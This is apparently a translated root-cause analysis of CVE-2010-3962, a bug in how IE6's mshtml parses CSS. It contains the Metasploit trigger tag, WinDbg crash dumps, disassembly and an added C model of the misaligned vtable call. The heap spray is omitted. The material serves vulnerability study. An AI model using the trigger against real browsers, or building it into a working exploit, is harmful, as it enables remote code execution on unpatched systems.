The local environment is Windows XP SP3 + IE6, with mshtml version 6.0.2900.5726; the PoC sample comes from metasploit->CVE-2010-3962.
Metasploit's summary of this vulnerability: while mshtml parses a particular CSS tag, a memory error can occur that turns a later call into a call through [vTable+0x30+1]. Whether the vulnerability is exploitable depends on whether the address fetched from [vTable+0x30+1] can be covered by the heap spray; since EIP cannot be steered, ROP cannot be used to bypass DEP, and so on.
The PoC consists of two parts: one is the heap spray, which is skipped here; the other is the specially crafted CSS tag that triggers the vulnerability, shown below:
<table style=position:absolute;clip:rect(0)>
(950.274): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7e2233e1 ebx=0012d6a0 ecx=0273b6e0 edx=3fffffff esi=00000000 edi=0273b6e0
eip=147e27c9 esp=0012d654 ebp=0012d664 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_erify.dll>+0x147e27c8:
147e27c9 ?? ???
0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012d650 7e291a95 <Unloaded_erify.dll>+0x147e27c8
0012d664 7e2c61df mshtml!CLayout::EnsureDispNodeBackground+0x97
0012d728 7e2c5440 mshtml!CTableLayoutBlock::EnsureTableDispNode+0x388
0012d908 7e2c5c25 mshtml!CTableLayout::CalculateLayout+0x295
0012da58 7e28b790 mshtml!CTableLayout::CalcSizeVirtual+0x665
0012db6c 7e2b9ec5 mshtml!CLayout::CalcSize+0x224
0012dbe0 7e2baa11 mshtml!CFlowLayout::MeasureSite+0x1e5
0012dc24 7e2ba948 mshtml!CFlowLayout::GetSiteWidth+0x12b
.text:7E291A4E mov edi, [ebp+pDispNode] ; argument 2
.text:7E291A51 test edi, edi
.text:7E291A53 mov esi, ecx
.text:7E291A55 jz loc_7E32D97B
;------------------------------ part omitted here ------------------------------
.text:7E291A87 mov ecx, edi
.text:7E291A89 call CDispNode::SetBackground(int)
.text:7E291A8E mov eax, [edi];eax = pDispNode -> vTable
.text:7E291A90 mov ecx, edi ;ecx = pDispNode -> this
.text:7E291A92 call dword ptr [eax+30h] ; CRASH!!!!
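The following C program is an added illustration, not part of the original analysis or of the Metasploit module. It models the misaligned vtable read behind the disassembly above: the dump shows eax=7e2233e1, an odd value consistent with the vtable pointer + 1 that Metasploit describes, so `call dword ptr [eax+30h]` fetches a dword straddling slots 12 and 13. The vtable contents are constructed; only the layout and the resulting eip 0x147e27c9 come from the dump.

```c
#include <stdint.h>
#include <stdio.h>

#define VTABLE_SLOTS 16
#define VTABLE_BYTES (VTABLE_SLOTS * 4)

/* Constructed CDispNode-style vtable (values made up, shaped like mshtml
 * addresses). Slot 12 (offset 0x30) and slot 13 are chosen so that the
 * off-by-one read reproduces the eip seen in the dump, 0x147e27c9. */
static const uint32_t sample_vtable[VTABLE_SLOTS] = {
    0x7e220000, 0x7e220010, 0x7e220020, 0x7e220030,
    0x7e220040, 0x7e220050, 0x7e220060, 0x7e220070,
    0x7e220080, 0x7e220090, 0x7e2200a0, 0x7e2200b0,
    0x7e27c9ab, 0x7e2bcd14, 0x7e2200e0, 0x7e2200f0,
};

/* Serialize the slots into the little-endian byte image the x86 CPU reads. */
static void build_image(const uint32_t *slots, uint8_t *image) {
    for (size_t i = 0; i < VTABLE_SLOTS; i++) {
        image[4 * i + 0] = (uint8_t)(slots[i]);
        image[4 * i + 1] = (uint8_t)(slots[i] >> 8);
        image[4 * i + 2] = (uint8_t)(slots[i] >> 16);
        image[4 * i + 3] = (uint8_t)(slots[i] >> 24);
    }
}

/* Little-endian dword fetch at an arbitrary byte offset: what
 * `call dword ptr [eax+30h]` reads when eax is not slot-aligned. */
static uint32_t fetch_dword(const uint8_t *image, size_t off) {
    return (uint32_t)image[off] | (uint32_t)image[off + 1] << 8 |
           (uint32_t)image[off + 2] << 16 | (uint32_t)image[off + 3] << 24;
}

/* Target of `call [eax+30h]` for eax = vtable + delta. delta 0 is the
 * healthy object; delta 1 is the off-by-one (eax=7e2233e1 in the dump).
 * Returns 0 if the read would fall outside the table. */
uint32_t call_target(const uint32_t *slots, size_t delta) {
    uint8_t image[VTABLE_BYTES];
    build_image(slots, image);
    if (delta + 0x30 + 4 > VTABLE_BYTES) return 0;
    return fetch_dword(image, delta + 0x30);
}

uint32_t healthy_target(void) { return call_target(sample_vtable, 0); }
uint32_t skewed_target(void)  { return call_target(sample_vtable, 1); }
int main(void) {
    printf("healthy %08x, off-by-one %08x\n",
           (unsigned)healthy_target(), (unsigned)skewed_target());
    return 0;
}
```

Every byte of the skewed address comes from mshtml's own vtable rather than from the page, which is why the summary above says EIP cannot be steered and exploitability hinges on whether the spray covers that fixed address.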
ba e 1 7E291B73 ".printf \"CDispNode 0x%08x\n\",@eax;.echo;g"
0:014> g
ModLoad: 75bc0000 75c3d000 C:\WINDOWS\system32\jscript.dll
CDispNode 0x02739144
CDispNode 0x027391b0
CDispNode 0x0273b304
CDispNode 0x0273b350
(a84.eb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7e2233e1 ebx=0012d6a0 ecx=0273b350 edx=3fffffff esi=00000000 edi=0273b350
eip=147e27c9 esp=0012d654 ebp=0012d664 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
<Unloaded_erify.dll>+0x147e27c8:
147e27c9 ?? ???